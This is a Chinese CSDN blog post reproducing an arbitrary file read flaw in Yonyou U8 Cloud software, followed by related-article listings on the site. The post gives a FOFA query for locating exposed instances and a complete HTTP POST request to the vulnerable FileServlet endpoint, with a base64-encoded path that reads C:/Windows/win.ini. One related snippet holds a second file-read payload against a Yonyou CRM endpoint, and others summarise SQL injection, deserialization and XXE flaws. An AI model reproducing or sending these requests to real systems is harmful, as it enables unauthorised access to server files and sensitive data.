【漏洞复现】用友U8C任意文件读取漏洞

已于 2024-03-27 00:55:05 修改
阅读量389 收藏 1
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2024-03-26 21:08:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KKleeeaa/article/details/137057707
版权

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01FOFA语句

app="用友-U8-Cloud"

0x02 漏洞POC

路径 是经过base64加密后的内容

POST /servlet/nc.bs.hr.tools.trans.FileServlet HTTP/1.1
Host: ip/host
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

path=QzovV2luZG93cy93aW4uaW5p

漏洞复现】用友-U8C-verify-sql注入
知黑而守白
02-28 125
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8Cloud verify 接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
用友U8C-CacheInvokeServlet反序列化(CNVD-2023-91638)
weixin_43567873的博客
03-13 241
用友U8C-CacheInvokeServlet反序列化(CNVD-2023-91638)
用友u8c-CacheInvokeServlet-反序列化rce漏洞-day漏洞复现(未公开)
weixin_43167326的博客
01-20 736
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。近日,新华三盾山实验室监测到用友官方发布了安全公告,修复了一个存在于用友U8Cloud中的反序列化漏洞,攻击者利用该漏洞可在目标服务器上执行任意代码。
漏洞复现用友U8 Cloud MultiRepChooseAction SQL注入漏洞
最新发布
qq_39894062的博客
09-19 788
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
用友U8C数据字典V25.rar
03-26
U8cloud V2.5数据字典,适用于u8cloud2.5-2.7版本,更高版本仅少量表有差异
java API 调用用友U8C制单
qq_42924837的博客
06-22 1254
3.辅助单位:这个是根据每个公司来的 每个公司都有不同的辅助单位 基本的意思就是 比如你是技术部的 你报销了什么 东西 这个东西就需要作为辅助单位填进去 还有就是你是技术部的 这个技术部也需要座位辅助单位 不过这个是跟公司来的 看公司需要什么。pk_corp 这个是公司在U8C的编码 这一串就是 但是有U8C好像需要加0 我现在的就是 但是有的不需要这个你要问用友 多数应该不用。作为开发 我需要去了解财务的知识 财务的逻辑 还要知道财务的流程 有时候沟通还不能完完全全的按照他们的想法来开发!
【0day】复现用友CRM系统任意文件读取漏洞
记录并分享学习安全的知识点..
07-07 648
用友TurboCRM一直致力于为客户提供架构完整、功能全面、具有良好伸缩性的产品,以支持客户业务的快速变化与成长。产品信息用友TurboCRM产品线由包括支持全面客户接触的TurboCTI和用友TurboLINK,匹配多业务模式和业务管理的用友TurboKEY和用友TurboCRM,支持与ERP等软件无缝联接、整合应用的用友TurboEAI,满足业务决策和商业智能应用用友TurboDSS系统构成。用友TurboCRM存在任意文件读取漏洞
用友U8 CRM downloadfile 任意文件读取漏洞复现
0xSec
04-30 701
用友U8CRM客户关系管理系统/pub/downloadfile.php接口处存在任意文件读取漏洞文件身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息,导致系统处于极不安全的状态。
用友U8+CRM 任意文件上传+读取漏洞复现
0xSec
08-13 2783
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
用友NC downCourseWare 任意文件读取漏洞复现
0xSec
06-06 619
用友NC 系统 /portal/pt/downCourseWare/download接口的filename参数存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。
用友U8+CRM help2 任意文件读取漏洞复现
0xSec
12-21 1434
​用友 U8 CRM客户关系管理系统help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。
业务生成财务凭证接口
08-08
用友凭证
用友u8c顾问环境搭建遇到的问题
m0_51116968的博客
01-19 695
搭建用友的u8c顾问环境时遇到的一些问题。
云解析旗舰版结合U8C(本地部署)应用设置
asdaddsd的博客
02-25 2733
U8c是用友推出的新一代ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。 u8c有两种部署方式,云部署和线下部署,线下部署如何快速实现外网访问是客户应用很关键的体验。 为此金万维通过自身在远程连接多年沉淀,推出云解析旗舰版,让u8c实现快速访问。 一、服务器本机安装U8C并调试正常访问,如下图: 二、安装动态域名解析快解析 1、访问http://www.kuaijiexi.com/下载安装快解析服务器端。如下图: 2、安装完成快解析客户端后,点击“免费注册”,注册..
用友U8 Cloud ArchiveVerify SQL注入漏洞复现(含nuclei-poc)
m0_50797689的博客
02-28 439
用友U8 Cloud ArchiveVerify SQL注入漏洞复现(含nuclei-poc)
漏洞复现】用友-U8C-反序列化-ClientRequestDispatch
知黑而守白
04-19 212
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8C ClientRequestDispatch接口存在反序列化漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
用友U8+CRM 任意文件读取漏洞复现
m0_69931798的博客
10-18 271
poc:burp 抓包 get 请求 GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini 替换即可。getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,本文 只复现 任意文件读取。body="用友U8CRM"
漏洞复现】用友-U8C-XXE-smartweb2
知黑而守白
05-15 126
用友UAP平台是一体化平台,其中包括了开发平台、集成平台、动态建模平台、商业分析平台(用友BQ)、数据处理平台(用友AE)、云管理平台和运行平台等7个领域产品,这些平台产品涵盖了软件应用的全生命周期和IT服务管理过程,用于全面支撑平台化企业,可以为大中型企业与公共组织构建信息化平台提供核心工具与服务用友UPA系统 smartweb2 接口存在xxe漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
用友U8+ CRM任意文件上传、任意文件读取 实战
m0_43397796的博客
02-24 2211
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞任意文件上传漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值